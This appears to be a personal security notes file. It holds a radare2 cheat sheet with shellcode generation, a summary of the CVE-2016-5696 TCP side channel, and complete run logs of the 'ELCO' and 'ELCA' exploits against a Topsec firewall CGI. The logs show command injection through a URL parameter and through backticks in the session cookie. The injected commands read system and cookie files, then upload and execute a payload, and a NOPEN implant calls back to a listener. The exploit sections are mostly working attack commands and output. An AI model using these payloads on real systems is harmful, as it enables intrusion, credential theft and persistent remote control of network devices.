# radare2: hexadecimal editor, disassembler and debugger

Installation

# apt-get install build-essential
# git clone https://github.com/radare/radare2.git
# radare2/sys/user.sh
# radare2/sys/user.sh
# r2pm init
# r2pm -i r2dec
# r2pm -l

Analyzing

# r2 challenge
# r2 -A challenge
# r2 -A -q -c 'iI' challenge # execute iI command and exit

[Command mode]

[addr]> aaa # Analysis = aa + aar + aac + aan
[addr]> aaaa # Experimental analysis = aaa + aae + aat + aav

[addr]> pd 10 # print disassemble 10 instructions at current seek
[addr]> 3 pd 10 # 3 times, print disassemble 10 instructions at current seek
[addr]> pd 10 @ main # print disassemble 10 instructions at main
[addr]> pd @ main ! 10 # print disassemble at current seek and limit to 10 bytes

[addr]> b 64 # set block size to 64

[addr]> i~machine,os # grep machine or os, at info output
[addr]> drr~[0] # awk first column
[addr]> drr~:0 # grep first line
[addr]> drr~:0[0] # grep first line and awk first column

[addr]> / secret ; px @@ hit0_* # find secret string and foreach hit, print hexdump

[addr]> ? 0x7a69 # quick numeric conversion

[addr]> i? # like rabin2

[addr]> f myflag @ main+123 # set a flag at main+123

[addr]> afl # list functions
[addr]> s sym.main # seek to addr/symbol
[addr]> pdf # print disassemble function

[Visual mode]

[addr]> vV # view graph
p/P # rotate graph modes
< # global callgraph
> # function callgraph

Decompiling

# r2 -A challenge
[addr]> pdd
[addr]> pdda

Debugging

# r2 -Ad `pgrep challenge` # attach and debug pid
# r2 -Ad challenge # run and debug program
# r2 -Ad rarun2 script.rr2 # debug in a custom environment

[Command mode]

[addr]> db # list breakpoints

[addr]> ds 10 # step into 10 instructions
[addr]> dso 10 # step over 10 instructions

[addr]> dcu main # continue until main

[addr]> drr # show registers references (telescoping)

[addr]> db 0x0040081d # add breakpoint
[addr]> dbc 0x0040081d drr # run command when breakpoint is hit

[addr]> dm # list memory maps
[addr]> dm= # list memory maps (ascii art)

[Visual mode]

[addr]> vpp # debug view

:<cmd> # run radare command

; # comment

b # breakpoint

o # seek to offset

p/P # rotate print modes

_ # fuzzy flag searcher

x/X # show xrefs/refs

d # define function
f # analyze function
d # define
r # rename function
fun.callme # function name

Editing

# r2 -w challenge

[Command mode]

[addr]> oo+ # Reopen the current file in read-write

[addr]> wz "See you in shell" # write string\00 at current seek

[addr]> wx 0xcafe @ 0x100 # write 0xcafe at 0x100

[addr]> wb 0x010203 # write the current block cycling 0x010203 pattern

[addr]> woe 42 3 @ edi ! 32 # a = 42; for i in xrange(32): edi[i] = a; a += 3

[addr]> wox 0xcafe @ ebx ! 2 # cf = [0xca, 0xfe]; for i in xrange(2): ebx[i] ^= cf[i]

[Visual mode]

[addr]> v # hex view

c # cursor
<tab> # switch between hex and plain areas
i # insert values
<shift><hjkl> + y # select and copy
<hjkl> + Y # find position and paste

[addr]> v # hex view
a # assemble code
A # visual assembler

ESIL (Evaluable String Intermediate Language)

[addr]> vip

:> s 0x08048486
:> e asm.emu = true # Run ESIL emulation analysis on disasm
:> e asm.esil = true # Show ESIL instead of mnemonic
:> e io.cache = true # Enable cache for io changes
:> aei # initialize ESIL VM state
:> aeip # initialize ESIL pc to curseek
:> aer eax=0x1234
:> aer
:> "aecue 0x1234,eax,^" # Continue until evil expression is true
ESIL BREAK!
:> s `aer~eip[1]`
:> pd -1

Exploiting

[addr]> iI~canary,nx,pic,crypto,class,arch,bits,stripped,static

[addr]> wopD 100 @ eax # Write a De Bruijn pattern
[addr]> wopO 0x41614141 # or wopO $$ - Finds the value into a De Bruijn pattern
[addr]> gi exec # Compile shellcode
[addr]> wx `g` @ eax # Write shellcode at @eax
[addr]> wb 0x90 @ eax+24 ! 52
[addr]> wv `/R call eax~eax:1[0]` @ eax+76 # Write value (address)
[addr]> pcp 80 @ eax # Print Code Python

Project management

[addr]> Ps <name> # save project
[addr]> Po <name> # open project
[addr]> Pn # show project notes
[addr]> Pn - # edit project notes

# radare2 utilities

rax2: base converter

# rax2 =2 31337
111101001101001b

# rax2 =16 111101001101001b
0x7a69

# rax2 -s 64656164
dead

# rax2 -S babe
62616265

# rax2 =16 0xbeef^0x7411
0xcafe

rabin2: binary program info extractor

# rabin2 -d challenge # show debug/dwarf information
# rabin2 -e challenge # show entrypoints
# rabin2 -H challenge # show headers
# rabin2 -I challenge # show binary info
# rabin2 -i challenge # show imports
# rabin2 -l challenge # list linked libraries
# rabin2 -R challenge # show relocations
# rabin2 -s challenge # show exported symbols
# rabin2 -S challenge # show sections
# rabin2 -z challenge # show strings inside .data section
# rabin2 -zz challenge # show strings
# rabin2 -g challenge # show all possible information

rasm2: assembler and disassembler tool

# rasm2 -a x86 -b 32 'mov eax, 33' # assemble
# rasm2 -a x86 -b 32 -d -s intel b821000000 # disassemble in intel
# rasm2 -a x86 -b 32 -d -s intel "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"
# rasm2 -a x86 -b 32 -E b821000000 # disassemble in esil
# rasm2 -L # list asm plugins
# rasm2 -a avr -b 8 -w spm # describe opcode (spm)

radiff2: unified binary diffing utility

# radiff2 -a x86 -b 64 /bin/true /bin/false 
# radiff2 -a x86 -b 64 -AA -C /bin/true /bin/false # code diffing using grapdiff algorithm

rafind2: advanced commandline hexadecimal editor

# rafind2 -z challenge # display zero-terminated strings
# rafind2 -s secret -X challenge # search a specific string and display hexdump
# rafind2 -m challenge # carve for known file-types

rahash2: block based hashing utility

# rahash2 -L # list available algorithms
# rahash2 -a all challenge # hash the file with all algorithms
# rahash2 -B -b 512 -a entropy challenge # entropy for each 512 byte block
# rahash2 -B -b 512 -a sha512 challenge # sha256 hash for each 512 byte block
# rahash2 -a sha384 -s "1234" # hash a string
# rahash2 -E base91 challenge # encode with base91
# rahash2 -E blowfish -S secretkey challenge # encrypt with blowfish

rarun2: run programs in exotic environments

Directives:

arg[0-3]: set arguments
aslr: enable/disable
clearenv
connect: stdin/stdout/stderr to a socket
input: string passed to stdin
libpath: override shared libraries path
listen: bound stdin/stdout/stderr to a listening socket
preload: a library
program: to be executed
setenv: set value to a given environment variable
setuid: set process user id
sleep: seconds
stdin: select file to read data
stdout: select file to write data
unsetenv: unset one environment variable

# rarun2 program=challenge listen=1234
# nc -v localhost 1234

ragg2-cc: CC frontend for compiling shellcodes

# cat execve.c
int main(){
        char *shell[2];
        shell[0]="/bin/sh";
        shell[1]=0;
        execve("/bin/sh",shell,NULL);
}
# ragg2-cc -a x86 -b 64 -k linux -x execve.c
eb00488d3d1b00000066480f6ec70f294424e8488d7424e831d2b83b0000000f0531c0c32f62696e2f736800

ragg2: frontend for r_egg

# ragg2 -a x86 -b 64 -k linux -f elf -i exec -e xor -c key=0xcc -s
.hex 31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05

# ragg2 -a x86 -b 64 -k linux -f elf -B `ragg2-cc -a x86 -b 64 -k linux -x execve.c` -e xor -c key=0xcc -s
.hex eb00488d3d1b00000066480f6ec70f294424e8488d7424e831d2b83b0000000f0531c0c32f62696e2f736800

# CVE-2016-5696: Global Rate Limit and Challenge ACKs

Pre-RFC 5961

- When a SYN packet is received,
   - if seq.num is in-window,
      - the receiver resets this connection.
   - else,
      - the receiver sends an ACK back to the sender.

- When a RST packet is received,
   - if seq.num is in-window,
      - the receiver resets this connection.

Post-RFC 5961

- When a SYN packet is received,
   - the receiver sends a challenge ACK back to the sender.
   - the sender sends a RST with the correct seq.num (derived from the challenge ACK).

- When a RST packet is received,
   - if seq.num exactly matches the next seq.num,
      - the connection is reset.
   - else, if seq.num is in-window,
      - the receiver sends a challenge ACK back to the sender.
   - else,
      - the receiver drops the packet.

Vulnerability

Use of a Global Rate Limit counter that is static (non-random, set to 100 by default) and shared for all the TCP connections.
The shared state can be exploited as a side channel to infer:

   - if a connection specified by its four-tuple exists
   - the next expected seq.num
   - the next expected ack.num

Connection (four-tuple) inference

(attacker) -- SYN/ACK + ClientIP/¿ClientPort_N?/ServerIP/ServerPort --> (server)
(server) -- RST --> (client)
(attacker) x 100 -- SYN/ACK + AttackerIP/AttackerPort/ServerIP/ServerPort --> (server)
(server) x 100 -- Challenge ACK --> (attacker)
...
(attacker) -- SYN/ACK + ClientIP/ClientPort/ServerIP/ServePort -->  (server)
(server) -- Challenge ACK -->  (client)
(attacker) x 100 -- SYN/ACK + AttackerIP/AttackerPort/ServerIP/ServerPort -->  (server)
(server) x 99 -- Challenge ACK -->  (attacker)

Sequence number inference

(attacker) -- RST + ClientIP/ClientPort/ServerIP/ServerPort + seq.num out-of-window -->  (server)
(server) --> Drop 
(attacker) x 100 -- RST + AttackerIP/AttackerPort/ServerIP/ServerPort + seq.num -->  (server)
(server) x 100 -- Challenge ACK -->  (attacker)
...
(attacker) -- RST + ClientIP/ClientPort/ServerIP/ServerPort + seq.num in-window --> (server)
(server) -- Challenge ACK --> (client)
(attacker) x 100 -- RST + AttackerIP/AttackerPort/ServerIP/ServerPort + seq.num --> (server)
(server) x 99 -- Challenge ACK --> (attacker)

ACK number inference

(attacker) -- ACK + ClientIP/ClientPort/ServerIP/ServerPort + seq.num out-of-window --> (server)
(server) --> Drop/Accept
(attacker) x 100 -- RST + AttackerIP/AttackerPort/ServerIP/ServerPort + seq.num --> (server)
(server) x 100 -- Challenge ACK --> (attacker)
...
(attacker) -- ACK + ClientIP/ClientPort/ServerIP/ServerPort + seq.num in-window --> (server)
(server) -- Challenge ACK --> (client)
(attacker) x 100 -- RST + AttackerIP/AttackerPort/ServerIP/ServerPort + seq.num --> (server)
(server) x 99 -- Challenge ACK --> (attacker)

References

https://tools.ietf.org/html/rfc5961
https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_cao.pdf
https://github.com/Gnoxter/mountain_goat
https://github.com/violentshell/rover

# Eligible Contestant (ELCO) exploit

# cat ELCA.txt

# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 19:14:54 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -t https://127.0.0.1:443 touch
[+] Seeded PRNG with 1471461306.3
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = False :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_touch>, host=' ', loadlast=False, mode='nopen', quiet=False, session=None, target='https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Requesting head https://127.0.0.1:443/site/image/white.gif with following provided settings: {'allow_redirects': False}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "HEAD /site/image/white.gif HTTP/1.1" 200 0
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- W/"3cd-345-4ce49cb1"
[+] Touch result: Header: date -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- W/"3cd-345-4ce49cb1"
[+] Touch result: Header: date -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201506.log and /current/down/fosho/2016-08-17-201506_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -l probe
[+] Seeded PRNG with 1471461312.61
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_probe>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Scheduling cleanup in 60 seconds...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c (\tsleep\t60\t&&\trm\t-f\t/www/htdocs/site/pages/.JmiwrZV\t)'}}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+%28%09sleep%0960%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV%09%29 HTTP/1.1" 200 None
[+] Probing system and retrieving target info...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c (\tcat\t/e*/is*\t&&\tuname\t-a\t&&\t/t*/b*/cfgt*\tsystem\tadmininfo\tshowonline\t&&\tcat\t/*/*coo*/*\t)>/www/htdocs/site/pages/.JmiwrZV'}}
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+%28%09cat%09%2Fe%2A%2Fis%2A%09%26%26%09uname%09-a%09%26%26%09%2Ft%2A%2Fb%2A%2Fcfgt%2A%09system%09admininfo%09showonline%09%26%26%09cat%09%2F%2A%2F%2Acoo%2A%2F%2A%09%29%3E%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV HTTP/1.1" 200 None
[+] Requesting get https://127.0.0.1:443/site/pages/.JmiwrZV with following provided settings: {'allow_redirects': True}
[+] "GET /site/pages/.JmiwrZV HTTP/1.1" 200 584
[+] System information retrieved:
Topsec Operating System v3.3.006.076.1
Topsec Network Security Technology CO.,LTD
http://www.topsec.com.cn
Linux (none) 2.6.27 #1 Thu Nov 18 11:15:12 HKT 2010 i686 unknown
Manager_name       Auth_address       Privilege          Online_time(hh:mm:ss)

tosusername=test
tospassword=dGVzdA==
tosusertype=7
auth_id=47
g_vsid=0
logintime=1150174789
milsecond=956
refreshtimes=0
sys_setup=2
sys_maintainance=2
sys_monitor=2
network=2
policy=2
vpn=2
sslvpn=2
aaa_conf=2
log_conf=2
log_access=2
anti_virus=2
resource_conf=2
dpi_conf=2
pki_conf=2
ids_conf=2
anti_spam=2
ha_conf=2

[+] Forcing removal of temp file from target now...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c killall\tsleep\t&&\trm\t-f\t/www/htdocs/site/pages/.JmiwrZV'}}
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+killall%09sleep%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV HTTP/1.1" 200 None
[-] User may be logged in. PLEASE REVIEW SYSTEM INFO
[+] Target is vulnerable. Safe to proceed.
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201512.log and /current/down/fosho/2016-08-17-201512_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -l exploit -c 127.0.0.1:1234
[+] Seeded PRNG with 1471461330.38
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
   callback = 127.0.0.1:1234 :: Callback IP:Port for tool (Example: 127.0.0.1:12345)
['target', 'binpath', 'callback', 'mode']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', callback='127.0.0.1:1234', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_exploit>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Uploading and running payload...
[+] Requesting post https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'files': {'vvnHD': <StringIO.StringIO instance at 0xb6d9454c>}, 'data': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c rm\t-f\t/tmp/ht*;tar\txzvf\t`ls\t-c\t/tmp/cgi*|head\t-n\t1`\t-C\t/tmp/\t&&\tchmod\t+x\t/tmp/ht*;/tmp/htpd'}}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "POST /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Exploit complete. Got root?
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201530.log and /current/down/fosho/2016-08-17-201530_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 19:14:54 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
Listening on *:1234... ok
Accepted connection from 127.0.0.1:39636
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0x1D1FFA80837E2AE0ED44E8C441F1405C
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     196/75 (261%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   127.0.0.1:0 (127.0.0.1:0)
  Remote Host:Port   (none):39636 (127.0.0.1:39636)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 19:15:34 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         4871 (4525)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.6.27 #1 Thu Nov 18 11:15:12 HKT 2010 i686
  CWD                /
  PID (PPID)         723 (1)

History loaded from "/current/bin/../down/history/(none).127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/(none).127.0.0.1-2016-08-17-19:15:35"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! (none):/>

# Eligible Candidate (ELCA) exploit

# cat ELCA.txt

# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 18:07:07 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -t https://127.0.0.1:443 touch
[+] Seeded PRNG with 1471457257.4
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = None :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = False :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath =  :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'', cert=None, cid=None, color=False, debug=False, func=<unbound method ELCAExploit.do_touch>, host=' ', loadlast=False, mode='nopen', quiet=False, session=None, target='https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Requesting head https://127.0.0.1:443/site/image/white.gif with following provided settings: {'allow_redirects': False}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "HEAD /site/image/white.gif HTTP/1.1" 200 0
[+] Etag - 439-345-4cb57ebd; Last modified - Wed Oct 13 10:41:17 2010
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Wed, 13 Oct 2010 09:41:17 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- "439-345-4cb57ebd"
[+] Touch result: Header: date -- Wed, 17 Aug 2016 18:06:54 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190737.log and /current/down/fosho/2016-08-17-190737_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l probe
[+] Seeded PRNG with 1471457319.73
[+] Preparing to run specified command...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Detected cookie id: session_id
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = session_id :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath =  :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target', 'cid']
Namespace(ask=False, binpath=u'', cert=None, cid='session_id', color=False, debug=False, func=<unbound method ELCAExploit.do_probe>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Checking current /site/pages/index.html etag
[+] Requesting head https://127.0.0.1:443/site/pages/index.html with following provided settings: {'allow_redirects': False}
[+] "HEAD /site/pages/index.html HTTP/1.1" 200 0
[+] Running touch on /site/pages/index.html
[+] Running command on target: x`touch /w*/*/*/p*/*`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`touch /w*/*/*/p*/*`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Checking etag again to confirm
[+] Requesting head https://127.0.0.1:443/site/pages/index.html with following provided settings: {'allow_redirects': False}
[+] "HEAD /site/pages/index.html HTTP/1.1" 200 0
[+] Target is vulnerable. Safe to proceed.
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190839.log and /current/down/fosho/2016-08-17-190839_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l exploit -p noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static -c 127.0.0.1:1234
[+] Seeded PRNG with 1471457351.78
[+] Preparing to run specified command...
[+] Already know cookie id: session_id
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = session_id :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath = noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
   callback = 127.0.0.1:1234 :: Callback IP:Port for tool (Example: 127.0.0.1:12345)
['target', 'binpath', 'callback', 'mode', 'cid']
Namespace(ask=False, binpath='noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', callback='127.0.0.1:1234', cert=None, cid='session_id', color=False, debug=False, func=<unbound method ELCAExploit.do_exploit>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Cleaning up /tmp/ ...
[+] Running command on target: x`rm -f /t*/cgi*`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`rm -f /t*/cgi*`'}, 'allow_redirects': True}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Uploading and moving file...
[+] Requesting post https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'files': {'uiIwq': <StringIO.StringIO instance at 0xb6dab86c>}, 'cookies': {'session_id': 'x`cp /t*/cg* /tmp/.a`'}, 'data': None}
[+] "POST /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Making file executable...
[+] Running command on target: x`chmod +x /tmp/.a`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`chmod +x /tmp/.a`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Running payload...
[+] Running command on target: x`/tmp/.a 2>&1`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`/tmp/.a 2>&1`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Exploit complete. Got root?
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190911.log and /current/down/fosho/2016-08-17-190911_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 18:07:07 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
Listening on *:1234... ok
Accepted connection from 127.0.0.1:34192
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0x6FE82C9C3156C88448659B6E034C6D30
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     199/75 (265%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   127.0.0.1:0 (127.0.0.1:0)
  Remote Host:Port   (none):34192 (127.0.0.1:34192)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 18:09:16 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         4689 (4525)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.4.19 #4 Wed Oct 13 17:29:47 CST 2010 i686
  CWD
  PID (PPID)         2416 (1)

History loaded from "/current/bin/../down/history/(none).127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/(none).127.0.0.1-2016-08-17-18:09:17"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! (none):>-help
[08-17-16 18:09:35 GMT][localhost:1234 -> (none).127.0.0.1:34192]
[-help]

Remote General Commands:
Usage: -elevate
Usage: -getenv
Usage: -gs category|filename [options-if-any]
Usage: -setenv VAR=[val]
Usage: -shell
Usage: -status
Usage: -time

Remote Server Commands:
Usage: -burn
Usage: -call ip port
Usage: -listen port
Usage: -pid

Remote Network Commands:
Usage: -icmptime target_ip [source_ip]
Usage: -ifconfig
Usage: -nslookup name1 ...
Usage: -ping -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -ping host
       -ping [-u|-t|-i] host
Usage: -trace -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -trace host
       -trace [-u|-t|-i] host

Remote Redirection Commands:
Usage: -fixudp port
